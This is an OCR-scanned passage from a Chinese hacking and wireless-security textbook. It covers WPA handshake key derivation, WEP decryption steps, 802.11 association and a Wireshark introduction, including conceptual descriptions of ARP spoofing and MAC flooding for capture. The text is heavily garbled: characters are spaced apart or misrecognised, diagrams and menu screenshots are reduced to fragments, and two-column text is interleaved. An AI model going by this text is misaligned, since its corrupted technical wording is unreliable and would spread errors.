256 位 即 32 字 节 的 密 铀 ，PMK 的 计算 公式 ， 
ESSID+PSK+ 人 迭代 次 数 4096 次 再 通过 Hash 计 
算 生 成 ， 其 中 PSK 是 无 线 密码 ，PMK 是 由 
STA 与 AP 分 别 计 算得 出 ，PMK 并 不 在 网 络 
中 进行 交换 。 


PTK (Pairwise Transient Key) 生成 算 
法 有 两 种 :HMAC-SHA1 散 列 算法 和 PRF-X 
散 列 算法 。 

PTK 的 计算 过 程 : PTK 是 通过 STA 与 AP 
的 四 步 握手 信息 计算 出 来 的 ， 计 算 公式 是 
PMK+Noncel+Nonce2+AP MAC+STA MAC 
计算 生成 ， 它 是 一 串 256 位 的 哈 希 值 ， 如 下 
图 所 示 。 


STA iAP 
: Anonce : 


Snonce+MIC 


GTK+MIC 


ACK 


计算 PTK 的 步骤 如 下 : 
[sep 加 AP 向 STA 发 送 一 个 Noncel， 这 个 
Noncel 是 由 AP 随 机 生成 的 ， 由 于 是 AP 随 机 
生成 的 ， 因 此 把 它 简 记 为 Anonce。 
[step 加 STA 拿 到 Noncel 后 随机 生成 Nonce2， 
这 时 需要 计算 PTK 的 所 有 信息 都 以 具备 ， 此 
时 STA 可 以 计算 出 PTK。 
[sep 国 STA 将 Nonce2 发 送 给 AP， 由 于 
Nonce2 是 由 STA 随 机 生成 ， 因 此 把 它 简 记 
为 Snonce。 它 是 以 明文 发 送 的 ， 同 时 STA 会 
通过 哈 希 算法 ， 计 算出 PTK 的 MIC 校 验 码 并 
一 同 发 送 给 AP， 这 个 MIC 码 是 不 可 逆 的 。 
侈 注意 : 如 果 Snonce 在 发 送 过 程 中 被 自 
改 ， 此 时 AP 计算 的 PTK 将 改变 ，MIC 同 样 
无 法 匹配 ，AP 将 会 中 断 连 接 ， 这 样 的 通信 
还 是 非常 安全 的 。 
[see 国 此 时 AP 也 拥有 了 计算 PTK 的 所 有 数 
据 ， 通 过 相同 的 哈 项 算法 计算 出 PTK 的 MIC 
校 验 码 ， 再 与 STA 发 送 的 MIC 校 验 码 进行 比 
较 ， 如 果 MIC 相 同 ， 证 明 STA 是 知道 PMK 的 。 
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[se 图 AP 将 GTK+MIC 发 送 给 STA， 此 时 
STA 便 拥有 了 PTK 与 GTK。 

[step 较 STA 回 复 一 个 ACK 数 据 包 ， 用 于 告知 
AP 已 经 准备 好 PTK， 后 续 数 据 包 可 以 使 用 
PTK 进 行 加 密 数 据 。 


6.5 ”实战 演练 


实战 演练 1 一 一 WEP 的 解密 步骤 


熟悉 WEP 的 加 密 原理 后 ， 再 来 了 解 一 
下 WEP 的 解密 原理 ，WEP 的 解密 还 是 比较 
简单 的 ， 它 是 加 密 过 程 的 一 个 逆序 过 程 。 

WEP 解 密 过 程 可 以 通过 下 图 来 描述 。 


~ 了 wm 于 iv 


[Re — Ow 


前 密 后 数据 


| 合并 数据 


-Sa | ev | bacv 


原始 明文 数据 


解密 过 程 可 以 通过 以 下 几 个 步 又 完成 : 
[step 四 通过 数据 包 中 的 IV 与 无 线 密码 生成 
KSA。 
[Sep 图 通过 KSA 结 合 Key ID 生成 本 次 加 密 数 
据 的 密 钥 流 。 
[step 图 通过 密 钥 流 与 加 密 数据 异 或 ， 得 到 本 
次 解密 数据 。 
[step 贺 如 果 存 在 数据 包 切 片 ， 将 解密 后 的 数 
据 包 组 装 成 原始 数据 。 
[step 图 通过 CRC32 算 法 生成 组 装 后 数据 包 的 
TQ@VS 
[step 图 对 生成 的 ICV 数 据 进 行 校 验 。 
实战 演练 2 一 一 无 线 通信 的 过 程 

要 想 将 计算 机 或 手机 等 终端 设备 连接 
到 无 线 网 络 ， 必 须 经 过 3 个 过 程 ， 分 别 是 扫 
描 (SCAN) 、 认 证 (Authentication ) 与 
关联 (Association) 。 经 历 这些 过 程 后 STA 
才能 与 AP 建立 关联 ， 并 开始 通信 ， 下 图 为 
STA 与 AP 建立 关联 的 示意 图 。 
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E 


黑客 攻防 与 无 线 安 全 从 新 手 到 高 手 ( 超 值 版 ) 


STA aP 
Discovery 选 择 AP 
(采用 侦 听 Beacon 帧 或 发 送 Probe 帧 ) 


authentication 
| 


Association 


OO 


同 建立 kssociation 关 联 的 ip 通信 
ea gl 


1. 扫描 〈SCAN) 


扫描 过 程 分 为 如 下 两 种 情况 : 

(1) 车 无 线 站 点 STA 设 成 Ad-hoc (无 
AP) 模式 。 

STA 先 寻找 是 否 已 有 IBSS (与 STA 
所 属相 同 的 SSID ) 存在 ， 如 有 ， 则 参加 
(join) ;， 若 无 ， 则 会 自己 创建 一 个 IBSS， 
等 其 他 工作 站 连接 。 

(2) 若 无 线 站 点 STA 设 成 Infrastructure 
(有 AP) 模式 ， 可 以 分 为 如 下 两 种 情况 。 

e 主动 扫描 方式 (特点 : 能 迅速 找 

到 ) ， 依 次 在 每 个 信道 上 发 送 Probe 
request 数据 帧 ， 从 Probe Response 中 
获取 BSS 的 基本 信息 ，Probe Response 
包含 的 信息 和 Beacon 帧 类 似 。 

e 被 动 扫描 方式 〈 特 点 : 找到 时 间 较 

长 ， 但 STA 节 电 ) 。 

通过 侦 听 AP 定期 发 送 的 Beacon 帧 来 发 
现 网 络 ，Beacon 帧 中 包含 该 AP 所 属 的 BSS 
的 基本 信息 以 及 AP 的 基本 能 力 级 ， 包 括 : 
BSSID (AP 的 MAC 地 址 ) 、SSID、 支 持 的 
速率 、 支 持 的 认证 方式 ， 加 密 算法 、Bea- 
cons 帧 发 送 间 隔 ， 使 用 的 信道 等 。 

当 未 发 现 包含 期 望 的 SSID 的 BSS 时 ， 
STA 可 以 工作 于 IBSS 状 态 ， 扫 描 阶 段 的 STA 
不 断 的 请 求 ， 通 过 AP 返回 的 帧 判断 AP 存 
在 ， 下 图 为 实现 扫描 示意 图 。 
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STA AP 


Probe Request 


Probe Response 


Probe Request 


Probe Response 


< 一 一 


2. 认证 

802.11 支 持 两 种 基本 的 认证 方式 ;: 

第 一 种 : Open-system Authentication 
(开放 型 )， 即 开放 型 连接 ， 下 图 为 连接 
示意 图 。 

(1) 等 同 于 不 需要 认证 ， 没 有 任何 安 
全 防护 能 力 。 

(2) 通过 其 他 方式 来 保证 用 户 接 入 网 
络 的 安全 性 ， 例 如 Address filter、 用 户 报 文 
中 的 SSID。 


STA AP 


Authentication Request 


Authentication Response 
(success) 


第 二 种 : Shared 一 Key Authentication 
(共享 密 钥 ) ， 即 共享 Key 连 接 ， 下 图 为 共 

享 Key 连 接 示 意图 。 

(1) 采用 WEP 加 密 算法 。 

(2) Attacker 可 以 通过 监听 AP 发 送 
的 明文 Challenge text 和 STA 回复 的 密 文 
Challenge text 计算 出 WEPKEY。 

另外 ，STA 可 以 通过 Deauthentication 来 
终结 认证 关系 。 


STA 2p 


Authentication Request 


Plain text challenge 


预 置 Key 


用 key 
加 密 明 文 


Cipher text challenge 


Authentication Response 
(success) 


3. 关联 (Association) 


(1) Association。STA 通过 Association 
和 一 个 AP 建立 关联 ， 后 续 的 数据 报 文 的 收 
发 只 能 和 建立 Association 关系 的 AP 进行 。 

(2) Reassociation。STA 在 从 一 个 老 的 
AP 移动 到 新 AP 时 ， 通 过 Reassociation 和 
新 AP 建立 关联 。Reassociation 前 必须 经 历 
Authentication 过 程 。 

(3) Deassociation。STA 通 过 Deasso- 
ciation 和 AP 解除 关联 关系 ， 整 体 的 过 程 可 
以 总 结 成 以 下 三 个 步 又; 

Probe 过 程 ， 首 先 STA 向 所 有 信道 发 出 
Probe 帧 ， 发 现 AP， 其 次 AP 应 答 Response。 

Authentication 过 程 ， 首 先 STA 向 AP 发 
出 验证 请 求 ， 然 后 进行 认证 过 程 〈 这 个 过 
程 可 能 会 存在 多 个 数据 交互 ) ， 其 次 AP 响 
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应 STA 的 认证 结果 。 


[step 图 Association 过 程 ， 首 先 STA 发 出 关联 
请 求 ， 其 次 AP 响 应 关联 请 求 。 

通过 以 上 三 个 步骤 后 如 果 认证 成 功 ， 
便 可 以 开始 通信 。 下 图 为 其 中 的 通信 流程 。 


IA ProbeRequest AP 
第 一 步 
ProbeResponse 
R 
AuthenticationRequest 
= | Authentication Process | 
AuthenticationResponse 
AssociationRequest 
第 三 步 
AssociationResponse 
6.6 小 试 身 手 
练习 1: 认识 无 线 数据 帧 的 结构 。 
练习 2: 了 解 控制 帧 的 作用 与 工作 原理 。 
练习 3: 了 解 管理 帧 的 作用 与 工作 原理 。 
练习 4: 了 解数 据 帧 的 作用 与 工作 原理 。 
练习 5: 掌握 无 线 通信 的 加 密 原理 。 
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第 7 草 无线 网 络 的 安全 分 析 工 具 


Wireshark (前 称 Ethereal) 是 一 个 网 络 封 包 分 析 软 件 ， 主 要 功能 是 捕获 网 络 封 包 ， 
并 尽 可 能 显示 出 最 为 详细 的 网 络 封包 信息 ， 网 络 管理 员 使 用 Wireshark 可 以 检测 当前 网 络 


问题 。 


wg7.1 认识 Wireshark 


Wireshark 不 是 入 侵 检 测 工具 ， 对 于 网 
络 上 的 异常 流量 行为 ， 不 会 产生 警示 或 是 任 
何 提示 ， 用 户 只 有 仔细 分 析 Wireshark 捕 获 的 
封包 ， 才 能 了 解 当前 网 络 的 运行 情况 。 


功能 介绍 


站 Wireshark 是 使 用 比较 广泛 的 网 络 抓 包 

软件 ， 主 要 是 因为 其 开源 免费 ， 通 过 修改 源 
码 还 可 以 添加 个 性 的 功能 。 使 用 的 人 群 主 要 
有 网 络 管理 员 、 网 络 工程 师 、 安 全 工程 师 、 
IT 运 维 工程 师 以 及 网 络 爱好 者 。 

在 实际 应 用 中 ， 使 用 Wireshark 可 以 进 
行 网 络 底层 分 析 、 解 决 网 络 故障 问题 、 发 现 
潜在 网 络 安全 问题 等 。 下 面 进 行 详细 介绍 : 

(1) 网 络 底 层 分 析 。 通 过 Wireshark 可 
以 捕获 底层 网 络 通信 ， 对 于 初学 者 而 言 可 
以 更 加 直观 地 去 了 解 网 络 通信 中 每 一 层 数 
据 处 理 的 过 程 ， 如 果 想 要 成 为 一 个 网 络 工 
程 师 ， 了 解 和 熟悉 网 络 中 每 一 层 通 信 过 程 
是 非常 有 必要 的 。 

(2) 解决 网 络 故障 问题 。 由 于 网 络 的 
特殊 性 ， 所 以 引起 网 络 故障 的 方式 也 是 多 
样 的 ， 通 过 Wireshark 可 以 很 好 地 检查 网 络 
通信 的 各 个 环节 ， 精 确定 位 到 具体 发 生 故 
障 的 节点 以 及 可 能 发 生 故障 的 区 域 。 

(3) 发 现 潜在 网 络 安全 问题 。 通 过 
Wireshark 对 网 络 数据 包 分 析 ， 可 以 发 现 
网 络 中 潜在 安全 问题 ， 例 如 : ARP 欺骗 、 
DDOS 网 络 攻击 等 。 


a 7.1.1 


7.1.2 抓 包 原理 


Wireshark 是 一 个 跨 平 台 抓 包 软 件 ， 可 
以 很 好 地 工作 在 Windows 系 统 、MacOS 系 
统 、Linux 以 及 Unix 系 统 平台 ， 也 正 是 这 样 
的 跨 平台 所 以 受到 使 用 者 的 追捧 。 

Wireshark 为 什么 可 以 抓 到 网 络 包 ， 可 
以 从 网 络 原 理 与 底层 原理 两 方面 来 分 析 。 


1. 网 络 原理 


网 络 原理 是 在 何 种 网 络 环境 下 进行 
抓 包 ， 这 是 抓 包 的 前 所， 其 中 分 为 三 种 情 
况 ， 即 本 机 环境 、 集 线 器 环境 、 交 换 机 
环境 。 

(1) 本 机 环境 。 本 机 环境 主要 针对 流 经 
本 机 网 卡 的 数据 包 。 下 图 为 抓 包 示意 图 。 


计算 机 


< 


通信 流量 二 让 


Wireshark 


(2) 集线器 环境 。 这 种 情况 在 网 络 中 
有 多 台 主 机 ， 多 台 主 机 通过 集线器 进行 网 
络 通信 ， 集 线 器 属于 物理 层 设备 ， 从 某 一 
个 接口 接收 的 数据 包 ， 会 被 集线器 从 其 他 
所 有 接口 转发 出 去 。 利 用 集线器 的 这 个 原 
理 ， 通 过 PC1 进行 抓 包 便 可 以 抓 取 整个 局 
域 网 的 数据 。 下 图 为 抓 包 示意 图 。 


第 7 章 无 线 网 络 的 安全 分 析 工 具 


(3) 交换 机 环境 。 集 线 器 的 最 大 缺点 在 于 使 用 集线器 的 整个 局 域 网 属于 一 个 “冲突 域 ”， 
而 且 随 着 终端 数量 的 增加 ， 冲 突 的 频率 也 越 来 越 高 ， 通 信 质 量 严重 下 降 ， 而 交换 机 每 一 个 
接口 属于 一 个 单独 的 “冲突 域 ”， 整 个 局 域 网 被 分 割 为 很 多 小 的 “冲突 域 ”， 通 信 质 量 大 
大 提高 。 

交换 机 环境 实现 抓 包 可 以 分 为 三 种 形式 ， 分 别 是 端口 镜像 、ARP 欺 骗 和 MAC 泛 洪 。 

(1) 端口 镜像 。 在 交换 机 网 络 中 将 所 有 通过 交换 机 中 转 的 数据 包 ， 全 部 都 复制 一 份 流 
经 一 个 端口 ， 这 个 就 是 端口 镜像 ， 如 下 图 所 示 。 


(2) ARP 欺骗 。 在 交换 机 中 保存 了 一 份 MAC 地 址 表 ， 其 中 包含 局 域 网 中 各 个 主机 
MAC 地 址 ， 通 过 PC1 发 送 ARP 地 址 欺骗 可 以 将 局 域 网 中 所 有 MAC 地 址 都 改写 为 PC1 的 
地 址 ， 此 时 所 有 数据 都 将 流 经 PC1， 再 由 PC1 进行 转发 由 此 实现 抓 包 ， 如 下 图 所 示 。 


@ 下 


@ 
gp 和 (出 ) ; 我 mp， 对 EM3c1 。。 AR 请 灾 (广播 ， 诊 是 TPs 二 MAC 地 址 告知 我 PC2 
了 PC1 @ 
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(3) MAC 泛 洪 : 通过 PC1 发 送 大 量 MAC 地 址 信息 的 垃圾 数据 包 ， 导 致 交换 机 MAC 
地 址 表 爆 表 ， 当 交换 机 没有 MAC 地 址 表 时 ， 流 经 交换 机 的 所 有 数据 都 会 以 广播 的 形式 发 


送 ， 如 下 图 所 示 。 
[ 屠 关 | 生 | 
@ 5 


泛 洪 垃圾 包 , 产生 大 量 MAC 地 址 
1 


Wireshark 


2. 底层 原理 网 等 ) 获取 网 络 数 据 。 
. 3 (3) Wiretap。 格 式 支 持 ， 从 抓 包 文件 
如 下 图 中 读 取 数据 包 ， 支 持 多 种 文件 格式 。 
A (4) Core。 核 心 引擎 ， 通 过 函数 调用 将 
Wireshark 其 他 模块 连接 在 一 起 ， 起 到 联动 调度 的 作 


二 二 || | ， 用 ， 其 中 还 包括 一 个 Epan ( 包 分 析 引 擎 )， 
,= 二 该 Epan 可 以 将 各 种 获取 的 数据 包 进行 分 类 
解析 。 

[ee | 


| wwe (5) Protocol-Tree。 保 存 数据 包 的 协议 
信息 , Wireshark 的 协议 结构 采用 树 形 结构 ， 
解析 协议 报 文 时 只 须 从 根 节点 通过 函数 句 


[jC] 


mio 加 柄 依次 调用 各 层 解析 函数 即 可 。 
CaptureFiters | | toransy (6) Dissectors 。 在 Epan/disserctor 目录 
: = 下 ， 各 种 协议 解码 器 ， 支 持 700 多 种 协议 解 
Wireshark 抓 包 底 层 原 理 示 意图 中 的 主 和 pe yw 
要 内 容 介 绍 如 下 : 析 ， 对 于 每 种 协议 ， 解 码 器 都 能 识别 出 协议 


(1) Wiatibeap。 这 是 Wireshatk 抓 包 | 字段 (field) ， 并 显示 出 字段 值 《fcld val- 
时 所 信 共 的话 之 全 ”也 是 WircD ul 最 核心 ae) ， 由 于 网 络 协议 种 类 很 多 ， 为 了 使 协议 
0 是 Wireshark 最 核心 和 协议 间 层 次 关系 明显 ， 对 数据 流 里 的 各 

(2) Capture。 捕 包 引擎 ， 利 用 Wimlib- 个 层次 的 协议 能 够 逐 层 处 理 ，Wireshark 系 
pcap 从 底层 抓 取 网 络 数据 包 ， Win/libpcap 统 采用 了 协议 树 的 方式 。 8 e 
提供 了 通用 的 抓 包 接口 ， 能 从 不 同类 型 的 (7) Plugins。 一 些 协 议 解 码 器 以 插件 
网 络 接口 (包括 以 太 网 、 令 牌 环 网 、ATM 的 形式 实现 ， 源 码 在 plugins 目录 。 
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(8) Display-Filters。 显示 过 滤 引 擎 ， 
源码 在 epan/dfilter 目录 。 
(9) GTK1/2。 图 像 处 理工 具 ， 处 理 用 


户 的 输入 输出 信息 。 


7.1.3 ”基本 界面 


使 用 Wireshark 抓 包 软件 先 要 从 它 的 界 
面 入 手 ， 其 主 界面 包括 工具 栏 、 快 捷 菜 单 、 


筛选 过 滤 、 功 能 显示 窗口 以 及 任务 栏 等 。 
打开 Wireshark 抓 包工 具 ， 单 击 “ 应 
程序 ”下 拉 菜 单 ， 从 中 选择 “09- 嗅 探 / 
欺骗 ”菜单 项 ， 在 弹出 的 菜单 中 可 以 看 到 
Wireshark 图 标 ， 如 下 图 所 示 。 


应 用 程序 ~ 


单 FRR 以 打开 Wireshark 
抓 包 软件 。 下 图 为 其 工作 界面 。 


A 
mG 项 


Entel 二 


如 果 已 经 进行 了 抓 包 操作 ， 当 打 开 一 
个 数据 包 后 ， 其 工作 界面 如 下 图 所 示 。 
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[ae Eee eae 


su mw) 


xn se SA) Mt ei 
PT 
面 


wT 
有 体 字 险 


_ 分 信息 里 示 


a PE TT EE TT] Prone pe 


下 面 重 点 介绍 Wireshark 工 作 界 面 中 常 
用 菜单 : 

(1) 文件 菜单 。 文 件 菜单 主要 负责 打 
开 已 经 抓 取 的 数据 包 、 最 近 打 开 的 数据 包 
合并 数据 包 、 导 入 导出 特定 数据 包 。 这 个 
在 后 面 还 会 重点 讲解 ， 这 里 只 对 界面 做 简 
单 了 解 。 下 图 为 文件 菜单 结构 。 


打开 Ctrl+O 

打开 最 近 » 
合并 (M)… 

从 Hex 转 储 导入 (|)... 
关闭 


Ctrl+W 


另存 为 (A).. Ctrlt+Shift+S 
文件 集合 » 
导出 特定 分 组 .… 

导出 分 组 解析 结果 » 


导出 PDU 到 文件 .. 

导出 SSL 会 话 密 铀 .. 

导出 对 象 ; 
打 Eh(P).. Ctrl+p 

退出 Ctrl+Q 


(2) 编辑 菜单 。 编 辑 菜单 主要 负责 对 
数据 包 分 类 标记 ， 以 及 在 抓 包 过 程 中 按照 
时 间 大 小 进行 分 包 存储 ， 还 有 整个 软件 的 
首选 项 也 在 编辑 菜单 中 ， 如 下 图 所 示 。 
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复制 

QQ 查找 分 组 IF)- 
坦 技 下 一 个 IJ) 
查找 上 一 个 岂 
标记 /取消 标记 分 组 IM) 
标记 所 有 显示 的 分 组 


忽略 /取消 忽略 分 组 山 


设置 /取消 设置 时 间 参 考 


时 间 平移 -- 
分 组 注释 
Delete All Packet Comments 
配置 文件 - 
首选 项 (P| 


CtrttF 
CettN 
Ctrlt+B 
Ctrt+M 
CertrshiftrM 


Ctrl+D 


Cut#T 


Ctrl+Shift+T 
CurtrAtrC 


Ctrl+Shift+A 
Cet+ShiftrP 


(3) 捕获 菜单 。 捕 获 菜单 用 于 设置 捕 


获 规则 ， 其 中 选项 菜单 可 以 设置 捕获 的 网 
卡 ， 还 可 以 设置 捕获 规则 ， 如 下 图 所 示 。 
图 选项 (DO)… Ctrl+K 
是 开始 (5) Ctrl+E 

时 
。 捐 革 过 兴 器 。 
刷新 接口 列表 F5 


(4) 分 析 菜 单 。 分 析 菜 单 针对 已 经 获 
取 的 数据 包 进 行 分 析 ， 通 过 制定 相应 的 规 
则 第 分 数据 包 ， 如 下 图 所 示 。 


显示 过 滤器 
显示 过 滤器 宏 (M).… 


作为 过 滤器 应 用 
准备 过 滤器 
对 话 过 滤器 
启用 的 协议 
解码 为 (A)… 

重新 载 入 Lua 插件 
SCTP 

追踪 流 


专家 信息 


Ctrl+Shift+E 


Ctrl+Shift+L 


(5) 视图 菜单 。 视 图 菜单 主要 是 针对 
软件 中 的 视图 显示 进行 设置 ， 重 点 需要 关 
注 的 是 解析 名 称 、 列 显示 中 的 着 色 规则 


如 下 图 所 示 。 
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V 主 T 具 栏 (M) 
要 过 滤器 工具 栏 (D) 
无 线 工具 栏 上 
要 状态 栏 1S) 
全 屏 {E) F11 
分 组 列表 (LD) 
六 分 组 详 清 (D) 
分 组 字 节 流 (B) 
时 间 显示 格式 四 ， 
解析 名 称 
缩放 加 ， 


展开 全 部 (E) 
收 起 全 部 (A) 
吾 着 色 分 组 列表 
着 色 规 则 (G)- 
对 话 着 色 
重 置 布 司 Ctrl+Shift+W 
豆 调整 列 宽 Ctrl+Shift+R 
内 部 "| 
在 新 留 呈 显示 分 组 W) 
重新 载 入 为 文件 格式 /捕获 
网 重新 加 载 (R) 


(6) 统计 菜单 。 统 计 菜 单 可 以 通过 对 
已 有 数据 进行 图 形 化 数据 分 析 ， 这 个 功能 
对 于 分 析 大 量 数据 是 非常 有 帮助 的 ， 如 下 
图 所 示 。 


捕获 文件 属性 
已 解析 的 地 址 
协议 分 级 (P) 
对 话 

端点 

分 组 长 度 

WO 图 表 仙 
服务 响应 时 间 » 
DHCP (BOOTP) Statistics 

ONC-RPC programs 

29West » 
ANCP 

BACnet » 
Collectd 

DNS 


Ctrt+Right 
Ctrl+Left 


Ctrl+Shift+F 
Ctrl+R 


Ctrl+Alt+Shift+C 


流量 图 

HART-IP 

HPFEEDS 

HTTP 
HTTP2 

Sametime 

TCP 流 图 形 由 
UDP 多 播 流 

F5 » 
IPv4 Statistics » 
IPv6 Statistics » 


7.2 ”开始 抓 包 


通过 前 面 的 学 习 ， 相 信 读 者 对 Wireshark 
有 了 一 个 基本 的 了 解 ， 下 面 针 对 如 何 抓 取 数 
据 以 及 如 何 对 数据 过 滤 进 行 讲解 。 


7.2.1 快速 配置 


Wireshark 的 特点 是 简单 易 用 ， 通 过 简 
单 的 设置 便 可 以 开始 抓 包 ， 甚 至 只 须 选择 
一 个 网 卡 后 ， 单 击 “ 开 始 ” 按 钮 ， 便 可 以 
实现 快速 抓 包 。 


1. 抓 包 操作 


具体 操作 步 又 如 下 : 
打开 Wireshark 抓 包工 具 ， 在 界面 “ 捕 
获 ” 功 能 选项 中 ， 可 以 对 捕获 数据 包 进 行 
快速 配置 ， 如 果 网 卡 中 产生 数据 ， 会 在 网 
卡 的 右 侧 显示 折线 图 ， 如 下 图 所 示 。 

捕获 

.使 用 这 个 过 滤器 : [出 |Entera capture filter 


wlanOmon pe b 


any NW 
Loopback: lo 
wlanO 

nflog 


双击 选中 的 网 卡 ， 便 可 以 开始 抓 包 ， 
此 时 “开始 ”按钮 变 成 灰色 ，“ 停 止 ” 按 
钮 与 “ 重 置 ” 按 钮 可 选 。 下 图 为 Wireshark 


侈 提示 : 抓 包 一 旦 开始 ， 默 认 数 据 包 显 
示 列 表 会 动态 刷新 最 新 捕获 的 数据 。 单 击 
“停止 ”按钮 可 以 停止 对 数据 包 的 捕获 ， 
此 时 状态 栏 会 显示 当前 捕获 的 数据 包 数 量 
及 大 小 。 
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2. 数据 包 显示 列 
默认 情况 下 ，Wireshark 会 给 出 一 个 初 


主要 内 容 介 绍 如 下 : 

(1) No。 编 号 ， 根 据 抓 取 的 数据 包 自 可 
动 分 配 。 

(2) Time。 时 间 ， 根 据 捕获 时 间 设 定 
该 列 。 

(3) Source: 源 地 址 信息 ， 如 果 数 据 包 
包含 源 地 址 信息 ， 例 如 他 、MAC 等 ， 这 类 
信息 会 显示 在 这 列 当中 。 

(4) Destination。 目 的 地 址 信息 ， 同 源 
地 址 类 似 。 

(5) Protocol。 协 议 信 息 ， 捕 获 的 数据 
包 会 根据 不 同 的 协议 进行 标注 ， 这 列 显示 
具体 协议 类 型 。 

(6) Length。 长 度 信息 ， 标 注 出 该 数据 
包 的 长 度 信息 。 

(7) Inof。 信 息 ，Wireshark 对 数据 包 
的 一 个 解读 。 


3. 修改 显示 列 


默认 的 显示 列 可 以 修改 ， 在 实际 数据 
分 析 当 中 ， 根 据 需要 可 以 修改 显示 列 的 项 
目 ， 具 体操 作 步 骤 如 下 : 
[6 加 选中 需要 加 入 显示 列 的 子 项 ， 右 击 ， 
在 弹出 的 快捷 菜单 中 选择 “应 用 为 列 ” 菜 
单 命令 ， 如 下 图 所 示 。 


文件 但 ”编辑 ([E) 视图 (Y) 应 转 (G) 捷 获 (C) 1 i 
sm Pe ， ”展开 全 部 (E) 
OD a 1 


收 起 全 部 (A) 


121 04:12:41.668209087 
122 84:12:41.699536268 
123 64:12:41.780773892 
124 84:12:41.788821624 
125 84:12:41.711347375 

6 41.714919849 


| 
~ TEEE 892.11 Acknowledgenent, Flags 
nedcement (6 


Type/subtype: Acknow 
Fr ol Fi 


13491 ... = Subtype: 13 
Ox99 


.090 6666 0000 6969 = Duration 


」 “应 用 为 列 


作为 这 滤器 应 用 


| ”准备 过 外 问 


对 话 过 滤器 
用 过 滤器 着 色 


| px 


复制 

量 示 分 组 字 节 -。 
导出 分 组 字 节 流 [B)- 
Wiki 协 议 页 面 

过 滤器 宇 段 参考 
协议 首选 项 
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列 ， 如 右 图 所 示 。 


“编辑 列 ”菜单 命令 ， 


7 Destination Protocol 


4. 修改 显示 时 间 


默认 情况 下 ，Wireshark 给 出 的 时 间 信 
息 不 方便 阅读 ， 为 此 ，Wireshark 提 供 了 多 
种 时 间 显 示 方 式 ， 用 户 可 以 根据 个 人 喜好 
进行 选择 。 具 体操 作 步 又 如 下 : 
[step 图 单 去“ 视图 ”菜单 ， 在 弹出 的 菜单 中 
选择 “时 间 显 示 格 式 ” 菜 单 命令 ， 如 下 图 
所 示 。 


时 间 显 示 格 式 (T) » 
解析 名 称 » 
缩放 (Z) 


Eee 国 这 样 就 可 以 将 默认 时 间 信 息 以 时 间 格 
式 显示 出 来 。 下 图 为 修改 后 的 时 间 ， 这 样 
更 加 符合 阅读 习惯 。 


Time 

2018-10-10 64:12:41.541339119 | 
2618-19-19 04:12:41.543999696 
2918-10-19 94:12:41.569918794 
|2918-16-19 94:12:41.578631296 


5. 名 字 和 解析 


默认 情况 下 ，Wireshark 只 开启 了 MAC 
地 址 解析 ， 针 对 不 同 厂商 的 MAC 头 部 信息 
进行 解析 ， 以 方便 阅读 ， 如 果 在 实际 中 有 
需要 可 以 开启 解析 网 络 名 称 、 解 析 传 输 层 
名 称 。 具 体 的 操作 步骤 如 下 : 
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step 图 此 时 显示 列 中 会 加 入 新 列 ， 这 样 针对 特殊 协议 分 析 会 非 
常 有 帮助 ， 如 下 图 所 示 。 


step 图 用户 还 可 以 删除 、 隐 藏 当前 列 ， 在 显示 列 标题 中 右 击 
在 弹出 的 菜单 中 可 以 通过 选择 相应 的 菜单 命令 ， 


编辑 列 
适应 内 容 


区 No. 
ViTime 

V Source 

V Destination 
V Protocol 
来 删除 或 隐藏 【Lemon 
V Type 
V Info 


删除 此 列 


[step 园 用 户 可 以 对 当前 列 信息 进行 修改 ， 在 显示 列 标题 中 右 击 ， 在 弹出 的 快捷 菜单 中 选择 
即 可 进入 列 信息 编辑 模式 ， 这 时 可 以 对 当前 列 信息 进行 修改 。 


类 型 :| Time format as specified) ~ | 字段: |Enter a fiel 


d 发 生 : Scancel voKk 


Length Type hfo 


[sep 国 单 去 “捕获 ”菜单 ， 在 弹出 的 菜单 
列表 中 选择 “选项 ”菜单 命令 ， 如 下 图 
所 示 。 


加 选项 (O)- Ctrl+K 
着 开始 (S) Ctrl+E 
a 

捕获 过 滤器 (F).… 

刷新 接口 列表 F5 


在 打开 的 设置 界面 中 选择 “选项 ” 选 
项 卡 ， 如 下 图 所 示 。 从 这 里 勾 选 相应 的 选 
项 解析 名 称 即 可 。 


输入 输出 选项 
显示 选项 解析 名 称 
V 实时 更 新 分 组 列表 Y MAC 地 址 解析 
V 实时 捕获 时 自动 浪 屏 解析 网 络 名 称 
解析 传输 层 名 称 


[step 图 用 户 还 可 以 手动 修改 对 地 址 的 解析 ， 
右 击 需要 解析 的 地 址 段 ， 在 弹出 的 菜单 中 
选择 “编辑 解析 的 名 称 ” 菜 单 命令 ， 如 下 
图 所 示 。 

| “标记 /取消 标记 分 组 M) | 
忽略 /取消 忽略 分 组 由 
设置/ 取消 设置 时 间 参 考 
时 间 平移 -- 
分 组 注释 .… 
编辑 解析 的 名 称 
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step 国 Wireshark 会 给 出 地 址 解析 库存 放 的 位 | 标记 /取消 标记 分 组 (M) 

置 ， 然 后 单 去“ 统计 ”菜单 项 ， 在 弹出 的 乱 史 取消 各 咯 分 组 

菜单 中 选择 “已 解析 的 地 址 ”菜单 命令 ， 站 

如 下 图 所 示 。 分 组 注释 | 
本 ee [ee 图 标记 后 的 数据 包 会 进行 高 亮 显 示 ， 变 
协议 分 级 (P) 成 黑 底 白 字 以 同 其 他 数据 包 进 行 区 别 ， 如 
对 话 下 图 所 示 。 
端点 
分 组 长 度 
1/O 图 表 (1) 

Bes 图 打开 下 图 所 示 的 对 话 框 ， 里 面 存放 

了 已 经 解析 的 地 址 信息 。 通 过 对 名 称 的 解 2. 修改 颜色 


析 ， 对 于 数据 包 的 来 源 去 处 会 更 加 清晰 明 
了 ， 所 以 名 称 解析 是 一 个 非常 好 的 功能 。 


Wireshark . 解析 后 的 地 址 .mp/wireshark-any-20181010054212_7Ln5sa.pcapng 人 @ 


为 了 区 分 不 同 的 数据 包 ，Wireshark 提 
供 了 对 数据 包 进 行 区 分 颜色 的 设置 ， 具 体 
操作 步骤 如 下 : 
[step 图 在 数据 包 上 右 击 ， 在 弹出 的 快捷 菜单 
中 选择 “对 话 着 色 ” 菜 单 命 令 ， 如 下 图 所 
示 ， 即 可 完成 对 数据 包 着 色 的 操作 ， 这 个 


在 /mpywireshark_any_29161916954212_7Ln56a.pcapng 中 找到 的 解析 后 的 地 址 一 


人 注释 


i 操作 只 针对 此 次 抓 包 有 效 。 
和 | ee 
* 旺 示 SCancel vOK 准备 过 滤器 
对 话 过 滤器 
侈 注意 如果 开 启 名 称 解析 可 能 会 对 性 对 话 着 色 


能 带 来 损耗 ， 同 时 地 址 解析 不 能 保证 全 ， [see 图 如 果 想 要 给 数据 包 添加 永久 性 的 着 色 
